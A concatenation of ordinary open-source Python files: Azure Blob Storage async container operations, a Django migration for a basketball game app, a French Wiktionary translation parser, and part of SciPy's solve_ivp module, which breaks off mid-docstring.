header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", lease_id, 'str')
header_parameters['x-ms-proposed-lease-id'] = self._serialize.header("proposed_lease_id", proposed_lease_id, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
change_lease.metadata = {'url': '/{containerName}'} # type: ignore
async def list_blob_flat_segment(
self,
prefix: Optional[str] = None,
marker: Optional[str] = None,
maxresults: Optional[int] = None,
include: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] = None,
timeout: Optional[int] = None,
request_id_parameter: Optional[str] = None,
**kwargs
) -> "_models.ListBlobsFlatSegmentResponse":
"""[Update] The List Blobs operation returns a list of the blobs under the specified container.
:param prefix: Filters the results to return only containers whose name begins with the
specified prefix.
:type prefix: str
:param marker: A string value that identifies the portion of the list of containers to be
returned with the next listing operation. The operation returns the NextMarker value within the
response body if the listing operation did not return all containers remaining to be listed
with the current page. The NextMarker value can be used as the value for the marker parameter
in a subsequent call to request the next page of list items. The marker value is opaque to the
client.
:type marker: str
:param maxresults: Specifies the maximum number of containers to return. If the request does
not specify maxresults, or specifies a value greater than 5000, the server will return up to
5000 items. Note that if the listing operation crosses a partition boundary, then the service
will return a continuation token for retrieving the remainder of the results. For this reason,
it is possible that the service will return fewer results than specified by maxresults, or than
the default of 5000.
:type maxresults: int
:param include: Include this parameter to specify one or more datasets to include in the
response.
:type include: list[str or ~azure.storage.blob.models.ListBlobsIncludeItem]
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ListBlobsFlatSegmentResponse, or the result of cls(response)
:rtype: ~azure.storage.blob.models.ListBlobsFlatSegmentResponse
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListBlobsFlatSegmentResponse"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
restype = "container"
comp = "list"
accept = "application/xml"
# Construct URL
url = self.list_blob_flat_segment.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
if prefix is not None:
query_parameters['prefix'] = self._serialize.query("prefix", prefix, 'str')
if marker is not None:
query_parameters['marker'] = self._serialize.query("marker", marker, 'str')
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', minimum=1)
if include is not None:
query_parameters['include'] = self._serialize.query("include", include, '[str]', div=',')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
deserialized = self._deserialize('ListBlobsFlatSegmentResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
list_blob_flat_segment.metadata = {'url': '/{containerName}'} # type: ignore
async def list_blob_hierarchy_segment(
self,
delimiter: str,
prefix: Optional[str] = None,
marker: Optional[str] = None,
maxresults: Optional[int] = None,
include: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] = None,
timeout: Optional[int] = None,
request_id_parameter: Optional[str] = None,
**kwargs
) -> "_models.ListBlobsHierarchySegmentResponse":
"""[Update] The List Blobs operation returns a list of the blobs under the specified container.
:param delimiter: When the request includes this parameter, the operation returns a BlobPrefix
element in the response body that acts as a placeholder for all blobs whose names begin with
the same substring up to the appearance of the delimiter character. The delimiter may be a
single character or a string.
:type delimiter: str
:param prefix: Filters the results to return only containers whose name begins with the
specified prefix.
:type prefix: str
:param marker: A string value that identifies the portion of the list of containers to be
returned with the next listing operation. The operation returns the NextMarker value within the
response body if the listing operation did not return all containers remaining to be listed
with the current page. The NextMarker value can be used as the value for the marker parameter
in a subsequent call to request the next page of list items. The marker value is opaque to the
client.
:type marker: str
:param maxresults: Specifies the maximum number of containers to return. If the request does
not specify maxresults, or specifies a value greater than 5000, the server will return up to
5000 items. Note that if the listing operation crosses a partition boundary, then the service
will return a continuation token for retrieving the remainder of the results. For this reason,
it is possible that the service will return fewer results than specified by maxresults, or than
the default of 5000.
:type maxresults: int
:param include: Include this parameter to specify one or more datasets to include in the
response.
:type include: list[str or ~azure.storage.blob.models.ListBlobsIncludeItem]
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ListBlobsHierarchySegmentResponse, or the result of cls(response)
:rtype: ~azure.storage.blob.models.ListBlobsHierarchySegmentResponse
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListBlobsHierarchySegmentResponse"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
restype = "container"
comp = "list"
accept = "application/xml"
# Construct URL
url = self.list_blob_hierarchy_segment.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
if prefix is not None:
query_parameters['prefix'] = self._serialize.query("prefix", prefix, 'str')
query_parameters['delimiter'] = self._serialize.query("delimiter", delimiter, 'str')
if marker is not None:
query_parameters['marker'] = self._serialize.query("marker", marker, 'str')
if maxresults is not None:
query_parameters['maxresults'] = self._serialize.query("maxresults", maxresults, 'int', minimum=1)
if include is not None:
query_parameters['include'] = self._serialize.query("include", include, '[str]', div=',')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
deserialized = self._deserialize('ListBlobsHierarchySegmentResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
list_blob_hierarchy_segment.metadata = {'url': '/{containerName}'} # type: ignore
async def get_account_info(
self,
**kwargs
) -> None:
"""Returns the sku name and account kind.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
restype = "account"
comp = "properties"
accept = "application/xml"
# Construct URL
url = self.get_account_info.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['x-ms-sku-name']=self._deserialize('str', response.headers.get('x-ms-sku-name'))
response_headers['x-ms-account-kind']=self._deserialize('str', response.headers.get('x-ms-account-kind'))
if cls:
return cls(pipeline_response, None, response_headers)
get_account_info.metadata = {'url': '/{containerName}'} # type: ignore
| {
"content_hash": "fdc85b581bfd68675f9f45bbfdd550f5",
"timestamp": "",
"source": "github",
"line_count": 1456,
"max_line_length": 174,
"avg_line_length": 57.559065934065934,
"alnum_prop": 0.6608954012839177,
"repo_name": "Azure/azure-sdk-for-python",
"id": "ed32bc96241b6d38d202052291f52153f05af79e",
"size": "84273",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "sdk/eventhub/azure-eventhub-checkpointstoreblob/azure/eventhub/extensions/checkpointstoreblob/_vendor/storage/blob/_generated/aio/operations/_container_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('team', '0004_remove_player_active'),
]
operations = [
migrations.CreateModel(
name='Game',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('host_name', models.CharField(blank=True, max_length=128, null=True)),
('guest_name', models.CharField(blank=True, max_length=128, null=True)),
('host_score', models.IntegerField(blank=True, default=0, null=True)),
('guest_score', models.IntegerField(blank=True, default=0, null=True)),
('start_time', models.DateTimeField(blank=True, null=True)),
('end_time', models.DateTimeField(blank=True, null=True)),
('field', models.CharField(blank=True, max_length=24, null=True)),
('created', models.DateTimeField(auto_now_add=True)),
('status', models.CharField(choices=[('p', 'Pending'), ('f', 'Finished')], default='p', max_length=1)),
('guest', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='team.Team')),
('host', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='team.Team')),
],
options={
'db_table': 'game',
},
),
migrations.CreateModel(
name='Recorder',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=32, null=True)),
('year', models.CharField(max_length=4)),
('team', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='team.Team')),
],
options={
'db_table': 'recorder',
},
),
migrations.CreateModel(
name='Score',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('player_number', models.IntegerField(blank=True, default=0, null=True)),
('player_name', models.CharField(blank=True, max_length=64, null=True)),
('status', models.CharField(choices=[('Y', 'Starter'), ('S', 'Substitutes'), ('NP', 'Not Play'), ('NA', 'N/A')], default='NA', max_length=2)),
('personal_foul', models.IntegerField(blank=True, default=0, null=True)),
('free_throw', models.IntegerField(default=0)),
('field_goal', models.IntegerField(default=0)),
('three_point', models.IntegerField(default=0)),
('assists', models.IntegerField(default=0)),
('steals', models.IntegerField(default=0)),
('created_at', models.DateTimeField(auto_now_add=True)),
('game', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='game.Game')),
('player', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='team.Player')),
],
options={
'ordering': ['player__number'],
'db_table': 'score',
},
),
migrations.CreateModel(
name='Season',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=64, null=True)),
('address', models.CharField(blank=True, max_length=128, null=True)),
('year', models.CharField(max_length=4)),
],
options={
'db_table': 'season',
},
),
migrations.CreateModel(
name='Timer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=32, null=True)),
('year', models.CharField(max_length=4)),
('team', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='team.Team')),
],
options={
'db_table': 'timer',
},
),
migrations.AddField(
model_name='game',
name='recorder',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='game.Recorder'),
),
migrations.AddField(
model_name='game',
name='season',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='game.Season'),
),
migrations.AddField(
model_name='game',
name='timer',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='game.Timer'),
),
]
| {
"content_hash": "5c487a2d677cdea2ed1be262ef78db81",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 158,
"avg_line_length": 48.055045871559635,
"alnum_prop": 0.5435280641466208,
"repo_name": "vollov/lotad",
"id": "0cf20c5999fe989a00ab85ba2b20431941c21885",
"size": "5309",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "game/migrations/0001_initial.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2064"
},
{
"name": "HTML",
"bytes": "30932"
},
{
"name": "JavaScript",
"bytes": "328457"
},
{
"name": "Python",
"bytes": "119806"
},
{
"name": "Shell",
"bytes": "312"
}
],
"symlink_target": ""
} |
import re
import pywikibot
from api.model.word import Entry
from .base import WiktionaryProcessor
from .base import stripwikitext
class FRWiktionaryProcessor(WiktionaryProcessor):
@property
def language(self):
return 'fr'
def __init__(self, test=False, verbose=False):
super(FRWiktionaryProcessor, self).__init__(test=test, verbose=verbose)
self.verbose = verbose
self.text_set = False
self.content = None
self.postran = {
'verbe': 'mat',
'adjectif': 'mpam',
'nom': 'ana',
'adverbe': 'tamb',
'pronom': 'solo-ana',
'préfixe': 'tovona',
'suffixe': 'tovana'
}
def retrieve_translations(self):
retcontent = []
regex = r'\{\{trad[\+\-]+?\|([A-Za-z]{2,3})\|(.*?)\}\}'
part_of_speech = 'ana'
definition = ""
for entry in self.getall():
print(entry)
if entry.language == 'fr':
if entry.part_of_speech in self.postran:
part_of_speech = self.postran[entry.part_of_speech]
definition = entry.entry
break
for entry in re.findall(regex, self.content):
langcode = entry[0]
entree = str(entry[1])
for x in "();:.,":
if entry[1].find(x) != -1:
continue
if entry[1].find('|') != -1:
entree = entree.split("|")[0]
if part_of_speech in self.postran:
part_of_speech = self.postran[part_of_speech]
e = Entry(
entry=entree,
part_of_speech=part_of_speech,
language=langcode,
definitions=[definition.strip()]
)
retcontent.append(e)
try:
retcontent.sort()
except UnicodeError:
pass
return retcontent
def getall(self, keepNativeEntries=False, **kw):
"""languges sections in a given page formatting: [(POS, lang, definition), ...]"""
if self.Page is not None:
assert isinstance(self.Page, pywikibot.Page), self.Page.__class__
items = []
if self.content is None:
raise Exception(
"self.page tsy voafaritra. self.process() tsy mbola nantsoina")
ct_content = self.content
for lang in re.findall(
'{{S\\|([a-z]+)\\|([a-z]{2,3})',
self.content):
# print(ct_content)
# word DEFINITION Retrieving
d1 = ct_content.find("{{S|%s|%s" % lang)
d2 = ct_content.find("=={{langue|", d1) + 1
if not d2:
d2 = ct_content.find("== {{langue|", d1 + 50) + 1
d_ptr = ct_content.find("=={{langue|%s" % lang[1], d1) + 1
if not d_ptr:
d_ptr = ct_content.find("== {{langue|%s" % lang[1], d1) + 1
if d2 > d1:
definition = ct_content[d1:d2]
else:
definition = ct_content[d1:]
try:
definition = definition.split('\n# ')[1]
definition = re.sub(
"\\[\\[(.*)#(.*)\\|?[.*]?\\]?\\]?", "\\1", definition)
except IndexError:
ct_content = ct_content[d_ptr:]
continue
ct_content = ct_content[d_ptr:]
if definition.find('\n') + 1:
definition = definition[:definition.find('\n')]
definition = stripwikitext(definition)
if not definition:
ct_content = ct_content[d_ptr:]
continue
pos = frpos = lang[0].strip() # POS
if frpos in self.postran:
pos = self.postran[frpos]
i = Entry(
entry=self.title,
part_of_speech=pos,
language=lang[1].strip(),
definitions=[definition.strip()]
)
items.append(i)
# print("Nahitana dikanteny ", len(items))
return items
| {
"content_hash": "5d0bfa82eb0186f8492b8f4011691918",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 90,
"avg_line_length": 32.02325581395349,
"alnum_prop": 0.47615589445654805,
"repo_name": "radomd92/botjagwar",
"id": "c742a6261e149f90fcdaed52902c8160a0463106",
"size": "4148",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "api/entryprocessor/wiki/fr.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "PLpgSQL",
"bytes": "28427"
},
{
"name": "Python",
"bytes": "657399"
},
{
"name": "Shell",
"bytes": "3709"
}
],
"symlink_target": ""
} |
import inspect
import numpy as np
from .bdf import BDF
from .radau import Radau
from .rk import RK23, RK45, DOP853
from .lsoda import LSODA
from scipy.optimize import OptimizeResult
from .common import EPS, OdeSolution
from .base import OdeSolver
METHODS = {'RK23': RK23,
'RK45': RK45,
'DOP853': DOP853,
'Radau': Radau,
'BDF': BDF,
'LSODA': LSODA}
MESSAGES = {0: "The solver successfully reached the end of the integration interval.",
1: "A termination event occurred."}
class OdeResult(OptimizeResult):
pass
def prepare_events(events):
"""Standardize event functions and extract is_terminal and direction."""
if callable(events):
events = (events,)
if events is not None:
is_terminal = np.empty(len(events), dtype=bool)
direction = np.empty(len(events))
for i, event in enumerate(events):
try:
is_terminal[i] = event.terminal
except AttributeError:
is_terminal[i] = False
try:
direction[i] = event.direction
except AttributeError:
direction[i] = 0
else:
is_terminal = None
direction = None
return events, is_terminal, direction
def solve_event_equation(event, sol, t_old, t):
"""Solve an equation corresponding to an ODE event.
The equation is ``event(t, y(t)) = 0``, here ``y(t)`` is known from an
ODE solver using some sort of interpolation. It is solved by
`scipy.optimize.brentq` with xtol=atol=4*EPS.
Parameters
----------
event : callable
Function ``event(t, y)``.
sol : callable
Function ``sol(t)`` which evaluates an ODE solution between `t_old`
and `t`.
t_old, t : float
Previous and new values of time. They will be used as a bracketing
interval.
Returns
-------
root : float
Found solution.
"""
from scipy.optimize import brentq
return brentq(lambda t: event(t, sol(t)), t_old, t,
xtol=4 * EPS, rtol=4 * EPS)
def handle_events(sol, events, active_events, is_terminal, t_old, t):
"""Helper function to handle events.
Parameters
----------
sol : DenseOutput
Function ``sol(t)`` which evaluates an ODE solution between `t_old`
and `t`.
events : list of callables, length n_events
Event functions with signatures ``event(t, y)``.
active_events : ndarray
Indices of events which occurred.
is_terminal : ndarray, shape (n_events,)
Which events are terminal.
t_old, t : float
Previous and new values of time.
Returns
-------
root_indices : ndarray
Indices of events which take zero between `t_old` and `t` and before
a possible termination.
roots : ndarray
Values of t at which events occurred.
terminate : bool
Whether a terminal event occurred.
"""
roots = [solve_event_equation(events[event_index], sol, t_old, t)
for event_index in active_events]
roots = np.asarray(roots)
if np.any(is_terminal[active_events]):
if t > t_old:
order = np.argsort(roots)
else:
order = np.argsort(-roots)
active_events = active_events[order]
roots = roots[order]
t = np.nonzero(is_terminal[active_events])[0][0]
active_events = active_events[:t + 1]
roots = roots[:t + 1]
terminate = True
else:
terminate = False
return active_events, roots, terminate
def find_active_events(g, g_new, direction):
"""Find which event occurred during an integration step.
Parameters
----------
g, g_new : array_like, shape (n_events,)
Values of event functions at a current and next points.
direction : ndarray, shape (n_events,)
Event "direction" according to the definition in `solve_ivp`.
Returns
-------
active_events : ndarray
Indices of events which occurred during the step.
"""
g, g_new = np.asarray(g), np.asarray(g_new)
up = (g <= 0) & (g_new >= 0)
down = (g >= 0) & (g_new <= 0)
either = up | down
mask = (up & (direction > 0) |
down & (direction < 0) |
either & (direction == 0))
return np.nonzero(mask)[0]
def solve_ivp(fun, t_span, y0, method='RK45', t_eval=None, dense_output=False,
events=None, vectorized=False, args=None, **options):
"""Solve an initial value problem for a system of ODEs.
This function numerically integrates a system of ordinary differential
equations given an initial value::
dy / dt = f(t, y)
y(t0) = y0
Here t is a 1-D independent variable (time), y(t) is an
N-D vector-valued function (state), and an N-D
vector-valued function f(t, y) determines the differential equations.
The goal is to find y(t) approximately satisfying the differential
equations, given an initial value y(t0)=y0.
Some of the solvers support integration in the complex domain, but note
that for stiff ODE solvers, the right-hand side must be
complex-differentiable (satisfy Cauchy-Riemann equations [11]_).
To solve a problem in the complex domain, pass y0 with a complex data type.
Another option always available is to rewrite your problem for real and
imaginary parts separately.
Parameters
----------
fun : callable
Right-hand side of the system. The calling signature is ``fun(t, y)``.
Here `t` is a scalar, and there are two options for the ndarray `y`:
It can either have shape (n,); then `fun` must return array_like with
shape (n,). Alternatively, it can have shape (n, k); then `fun`
must return an array_like with shape (n, k), i.e., each column
corresponds to a single column in `y`. The choice between the two
options is determined by `vectorized` argument (see below). The
vectorized implementation allows a faster approximation of the Jacobian
by finite differences (required for stiff solvers).
t_span : 2-tuple of floats
Interval of integration (t0, tf). The solver starts with t=t0 and
integrates until it reaches t=tf.
y0 : array_like, shape (n,)
Initial state. For problems in the complex domain, pass `y0` with a
complex data type (even if the initial value is purely real).
method : string or `OdeSolver`, optional
Integration method to use:
* 'RK45' (default): Explicit Runge-Kutta method of order 5(4) [1]_.
The error is controlled assuming accuracy of the fourth-order
method, but steps are taken using the fifth-order accurate
formula (local extrapolation is done). A quartic interpolation
polynomial is used for the dense output [2]_. Can be applied in
the complex domain.
* 'RK23': Explicit Runge-Kutta method of order 3(2) [3]_. The error
is controlled assuming accuracy of the second-order method, but
steps are taken using the third-order accurate formula (local
extrapolation is done). A cubic Hermite polynomial is used for the
dense output. Can be applied in the complex domain.
* 'DOP853': Explicit Runge-Kutta method of order 8 [13]_.
Python implementation of the "DOP853" algorithm originally
written in Fortran [14]_. A 7-th order interpolation polynomial
accurate to 7-th order is used for the dense output.
Can be applied in the complex domain.
* 'Radau': Implicit Runge-Kutta method of the Radau IIA family of
order 5 [4]_. The error is controlled with a third-order accurate
embedded formula. A cubic polynomial which satisfies the
collocation conditions is used for the dense output.
* 'BDF': Implicit multi-step variable-order (1 to 5) method based
on a backward differentiation formula for the derivative
approximation [5]_. The implementation follows the one described
in [6]_. A quasi-constant step scheme is used and accuracy is
enhanced using the NDF modification. Can be applied in the
complex domain.
* 'LSODA': Adams/BDF method with automatic stiffness detection and
switching [7]_, [8]_. This is a wrapper of the Fortran solver
from ODEPACK.
Explicit Runge-Kutta methods ('RK23', 'RK45', 'DOP853') should be used
for non-stiff problems and implicit methods ('Radau', 'BDF') for
stiff problems [9]_. Among Runge-Kutta methods, 'DOP853' is recommended
for solving with high precision (low values of `rtol` and `atol`).
If not sure, first try to run 'RK45'. If it makes unusually many
iterations, diverges, or fails, your problem is likely to be stiff and
you should use 'Radau' or 'BDF'. 'LSODA' can also be a good universal
choice, but it might be somewhat less convenient to work with as it
wraps old Fortran code.
You can also pass an arbitrary class derived from `OdeSolver` which
implements the solver.
t_eval : array_like or None, optional
Times at which to store the computed solution, must be sorted and lie
within `t_span`. If None (default), use points selected by the solver.
dense_output : bool, optional
Whether to compute a continuous solution. Default is False.
events : callable, or list of callables, optional
Events to track. If None (default), no events will be tracked.
Each event occurs at the zeros of a continuous function of time and
state. Each function must have the signature ``event(t, y)`` and return
a float. The solver will find an accurate value of `t` at which
``event(t, y(t)) = 0`` using a root-finding algorithm. By default, all
zeros will be found. The solver looks for a sign change over each step,
so if multiple zero crossings occur within one step, events may be
missed. Additionally each `event` function might have the following
attributes:
terminal: bool, optional
Whether to terminate integration if this event occurs.
Implicitly False if not assigned.
direction: float, optional
Direction of a zero crossing. If `direction` is positive,
`event` will only trigger when going from negative to positive,
and vice versa if `direction` is negative. If 0, then either
direction will trigger event. Implicitly 0 if not assigned.
You can assign attributes like ``event.terminal = True`` to any
function in Python.
vectorized : bool, optional
Whether `fun` is implemented in a vectorized fashion. Default is False.
args : tuple, optional
Additional arguments to pass to the user-defined functions. If given,
the additional arguments are passed to all user-defined functions.
So if, for example, `fun` has the signature ``fun(t, y, a, b, c)``,
then `jac` (if given) and any event functions must have the same
signature, and `args` must be a tuple of length 3.
options
Options passed to a chosen solver. All options available for already
implemented solvers are listed below.
first_step : float or None, optional
Initial step size. Default is `None` which means that the algorithm
should choose.
max_step : float, optional
Maximum allowed step size. Default is np.inf, i.e., the step size is not
bounded and determined solely by the solver.
rtol, atol : float or array_like, optional
Relative and absolute tolerances. The solver keeps the local error
estimates less than ``atol + rtol * abs(y)``. Here `rtol` controls a
relative accuracy (number of correct digits). But if a component of `y`
is approximately below `atol`, the error only needs to fall within
the same `atol` threshold, and the number of correct digits is not
guaranteed. If components of y have different scales, it might be
beneficial to set different `atol` values for different components by
passing array_like with shape (n,) for `atol`. Default values are
1e-3 for `rtol` and 1e-6 for `atol`.
jac : array_like, sparse_matrix, callable or None, optional
Jacobian matrix of the right-hand side of the system with respect
to y, required by the 'Radau', 'BDF' and 'LSODA' method. The
Jacobian matrix has shape (n, n) and its element (i, j) is equal to
``d f_i / d y_j``. There are three ways to define the Jacobian:
* If array_like or sparse_matrix, the Jacobian is assumed to
be constant. Not supported by 'LSODA'.
* If callable, the Jacobian is assumed to depend on both
t and y; it will be called as ``jac(t, y)``, as necessary.
For 'Radau' and 'BDF' methods, the return value might be a
sparse matrix.
* If None (default), the Jacobian will be approximated by
finite differences.
It is generally recommended to provide the Jacobian rather than
relying on a finite-difference approximation.
jac_sparsity : array_like, sparse matrix or None, optional
Defines a sparsity structure of the Jacobian matrix for a finite-
difference approximation. Its shape must be (n, n). This argument
is ignored if `jac` is not `None`. If the Jacobian has only few
non-zero elements in *each* row, providing the sparsity structure
will greatly speed up the computations [10]_. A zero entry means that
a corresponding element in the Jacobian is always zero. If None
(default), the Jacobian is assumed to be dense.
Not supported by 'LSODA', see `lband` and `uband` instead.
